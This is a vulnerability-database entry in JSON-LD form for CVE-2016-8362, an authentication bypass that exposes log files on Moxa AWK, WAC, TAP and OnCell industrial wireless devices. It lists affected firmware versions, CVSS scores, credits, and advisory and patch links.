Search criteria
16 vulnerabilities found for awk-3121 by moxa
VAR-201702-0071
Vulnerability from variot - Updated: 2023-12-18 13:48An issue was discovered in Moxa OnCell OnCellG3470A-LTE, AWK-1131A/3131A/4131A Series, AWK-3191 Series, AWK-5232/6232 Series, AWK-1121/1127 Series, WAC-1001 V2 Series, WAC-2004 Series, AWK-3121-M12-RTG Series, AWK-3131-M12-RCC Series, AWK-5232-M12-RCC Series, TAP-6226 Series, AWK-3121/4121 Series, AWK-3131/4131 Series, and AWK-5222/6222 Series. Any user is able to download log files by accessing a specific URL. MOXAOnCell is an industrial grade IP gateway product. The MoxaOnCellSeries product verification bypass vulnerability allows an attacker to bypass the authentication mechanism and gain unauthorized access. Moxa OnCell Series products are prone to an authentication-bypass vulnerability and an OS command execution vulnerability. Moxa OnCellG3470A-LTE etc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201702-0071",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "oncellg3470a-lte",
"scope": null,
"trust": 1.4,
"vendor": "moxa",
"version": null
},
{
"model": "awk-5232-m12-rcc",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "awk-6232",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "05-30-2017"
},
{
"model": "awk-1127",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "awk-5232",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "05-30-2017"
},
{
"model": "awk-3121-m12-rtg",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "awk-3191",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "05-30-2017"
},
{
"model": "awk-1121",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "wac-1001 v2",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "wac-2004",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "awk-3131a",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "10-31-2016"
},
{
"model": "awk-4131a",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "10-31-2016"
},
{
"model": "awk-1131a",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "10-31-2016"
},
{
"model": "awk-3131-m12-rcc",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "oncellg3470a-lte",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "10-31-2016"
},
{
"model": "awk-1121",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-1127",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-1131a",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-3121-m12-rtg",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-3131-m12-rcc",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-3131a",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-3191",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-4131a",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-5232",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-5232-m12-rcc",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-6232",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "wac-1001 v2",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "wac-2004",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-5222/6222 series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "awk-3131/4131 series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "awk-3121/4121 series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "tap-6226 series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "awk-5232-m12-rcc series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "awk-3131-m12-rcc series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "awk-3121-m12-rtg series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "wac-2004 series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "wac-1001 series",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "v2"
},
{
"model": "awk-1121/1127 series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "awk-5232/6232 series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "awk-3191 series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "awk-1131a/3131a/4131a series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "awk-1131a",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "10-31-2016"
},
{
"model": "awk-6232",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "05-30-2017"
},
{
"model": "oncellg3470a-lte",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "10-31-2016"
},
{
"model": "awk-5232",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "05-30-2017"
},
{
"model": "awk-5232-m12-rcc",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "awk-4131a",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "10-31-2016"
},
{
"model": "awk-3131a",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "10-31-2016"
},
{
"model": "awk-1121",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "awk-3131-m12-rcc",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "awk-3191",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "05-30-2017"
},
{
"model": "wac-2004",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "wac-1001",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "v20"
},
{
"model": "tap-6226",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "oncellg3470a-lte",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-6232",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-6222",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-5232-m12-rcc",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-5232",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-5222",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-4131a",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-4131",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-4121",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-3191",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-3131a",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-3131-m12-rcc",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-3131",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-3121-m12-rtg",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-3121",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-1131a",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-1127",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-1121",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10731"
},
{
"db": "BID",
"id": "94092"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007996"
},
{
"db": "NVD",
"id": "CVE-2016-8362"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-108"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:oncellg3470a-lte_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "10-31-2016",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:oncellg3470a-lte:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-4131a_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "10-31-2016",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-4131a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3191_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "05-30-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3191:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-5232_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "05-30-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-5232:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-6232_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "05-30-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-6232:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-1121_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "06-29-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-1121:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-1127_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "06-29-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-1127:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:wac-1001_v2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "06-29-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:wac-1001_v2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:wac-2004_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "06-29-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:wac-2004:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3121-m12-rtg_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "06-29-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3121-m12-rtg:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3131-m12-rcc_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "06-29-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3131-m12-rcc:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-5232-m12-rcc_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "06-29-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-5232-m12-rcc:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3131a_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "10-31-2016",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3131a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-1131a_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "10-31-2016",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-1131a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-8362"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Maxim Rupp",
"sources": [
{
"db": "BID",
"id": "94092"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-108"
}
],
"trust": 0.9
},
"cve": "CVE-2016-8362",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2016-8362",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 4.9,
"id": "CNVD-2016-10731",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:H/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "VHN-97182",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2016-8362",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-8362",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2016-10731",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201611-108",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-97182",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2016-8362",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10731"
},
{
"db": "VULHUB",
"id": "VHN-97182"
},
{
"db": "VULMON",
"id": "CVE-2016-8362"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007996"
},
{
"db": "NVD",
"id": "CVE-2016-8362"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-108"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in Moxa OnCell OnCellG3470A-LTE, AWK-1131A/3131A/4131A Series, AWK-3191 Series, AWK-5232/6232 Series, AWK-1121/1127 Series, WAC-1001 V2 Series, WAC-2004 Series, AWK-3121-M12-RTG Series, AWK-3131-M12-RCC Series, AWK-5232-M12-RCC Series, TAP-6226 Series, AWK-3121/4121 Series, AWK-3131/4131 Series, and AWK-5222/6222 Series. Any user is able to download log files by accessing a specific URL. MOXAOnCell is an industrial grade IP gateway product. The MoxaOnCellSeries product verification bypass vulnerability allows an attacker to bypass the authentication mechanism and gain unauthorized access. Moxa OnCell Series products are prone to an authentication-bypass vulnerability and an OS command execution vulnerability. Moxa OnCellG3470A-LTE etc",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-8362"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007996"
},
{
"db": "CNVD",
"id": "CNVD-2016-10731"
},
{
"db": "BID",
"id": "94092"
},
{
"db": "VULHUB",
"id": "VHN-97182"
},
{
"db": "VULMON",
"id": "CVE-2016-8362"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-8362",
"trust": 3.5
},
{
"db": "ICS CERT",
"id": "ICSA-16-308-01",
"trust": 2.9
},
{
"db": "BID",
"id": "94092",
"trust": 2.7
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007996",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201611-108",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2016-10731",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-97182",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2016-8362",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10731"
},
{
"db": "VULHUB",
"id": "VHN-97182"
},
{
"db": "VULMON",
"id": "CVE-2016-8362"
},
{
"db": "BID",
"id": "94092"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007996"
},
{
"db": "NVD",
"id": "CVE-2016-8362"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-108"
}
]
},
"id": "VAR-201702-0071",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10731"
},
{
"db": "VULHUB",
"id": "VHN-97182"
}
],
"trust": 1.62773228375
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10731"
}
]
},
"last_update_date": "2023-12-18T13:48:41.535000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.moxa.com/"
},
{
"title": "MoxaOnCellSeries product verification patch to bypass vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/83636"
},
{
"title": "Moxa OnCell Series product authentication bypass vulnerability fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=65334"
},
{
"title": "Moxa OnCell Series product authentication bypass vulnerability fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=65481"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10731"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007996"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-108"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-97182"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007996"
},
{
"db": "NVD",
"id": "CVE-2016-8362"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-16-308-01"
},
{
"trust": 2.4,
"url": "http://www.securityfocus.com/bid/94092"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-8362"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-8362"
},
{
"trust": 0.3,
"url": "http://www.moxa.com/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/287.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10731"
},
{
"db": "VULHUB",
"id": "VHN-97182"
},
{
"db": "VULMON",
"id": "CVE-2016-8362"
},
{
"db": "BID",
"id": "94092"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007996"
},
{
"db": "NVD",
"id": "CVE-2016-8362"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-108"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2016-10731"
},
{
"db": "VULHUB",
"id": "VHN-97182"
},
{
"db": "VULMON",
"id": "CVE-2016-8362"
},
{
"db": "BID",
"id": "94092"
},
{
"db": "JVNDB",
